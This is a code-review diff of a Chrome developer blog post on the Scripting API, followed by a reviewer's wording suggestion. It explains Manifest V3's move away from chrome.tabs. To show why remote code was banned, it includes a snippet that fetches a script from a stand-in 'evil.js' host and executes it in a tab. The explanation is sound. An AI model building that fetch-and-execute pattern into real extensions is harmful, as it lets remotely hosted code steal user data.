site/en/blog/crx-scripting-api/index.md

```diff
@@ -0,0 +1,289 @@
+capabilities for extensions. Together, these concerns clearly defined a need for a new namespace to
+house scripting capabilities.
+
+### The junk drawer
+
+One of the issues that has been bothering the Extensions Team for the past few years is that the
+`chrome.tabs` API is overloaded. When this API was first introduced most of the capabilities it
+provided were related to the broad concept of a browser tab. Even at that point, though, it was a
+bit of a grab bag of features and over the years this collection has only grown.
+
+[Image: a beautiful junk drawer. Caption: Artist's rendition of the Tabs API.]
+
+By the time Manifest V3 was released, the Tabs API had grown to cover basic tab management,
+selection management, window organization, messaging, zoom control, basic navigation, scripting, and
+a few other smaller capabilities. While these are all important, it can be a bit overwhelming for
+developers when they're getting started and for the Chrome team as we maintain the platform and
+consider requests from the developer community.
+
+Another complicating factor is that the `tabs` permission is not well understood. While many other
+permissions restrict access to a given API (e.g. [`storage`][storage-api]), this permission is a bit
+unusual in that it only grants the extension access to sensitive properties on Tab instances (and by
+extension also impacts the Windows API). Understandably, many extension developers mistakenly think
+they need this permission in order to access methods on the Tabs API like `chrome.tabs.create` or,
+more germanely, `chrome.tabs.executeScript`. Moving functionality out of the Tabs API helps clear up
+some of this confusion.
+
+### Breaking changes
+
+When designing Manifest V3, one of the major issues that we wanted to address was abuse and malware
+enabled by "remotely hosted code." It's common for abusive extension authors to execute scripts
+fetched from remote servers to steal user data, inject malware, and evade detection. While good
+actors also use this capability, we ultimately felt that it was simply too dangerous to remain as it
+was.
+
+There are a couple different ways that extensions can execute unbundled code, but the relevant one
+here is the Manifest V2 `chrome.tabs.executeScript` method. This method allows an extension to
+execute an arbitrary string of code in a target tab. This, in turn, means that a malicious developer
+can fetch an arbitrary script from a remote server and execute it inside any page the extension can
+access. We knew that if we wanted to address the remote code problem that we would have to drop this
+feature.
+
+```js
+let result = await fetch('https://example.com/evil.js');
+let script = await result.text();
+chrome.tabs.executeScript({
+  code: script,
+});
+```
+
+We also wanted to clean up some other, more subtle issues with the Manifest V2 version's design,
+like the `matchAboutBlank` property on the options object.
```

Comment:
We never revisit this, so, as a reader, I'm left wondering "What was the issue with matchAboutBlank?"

What about something like:

```suggestion
We also wanted to clean up some other, more subtle issues with the Manifest V2 version's design,
and make the API a more polished and predictable tool.
```

Or similar?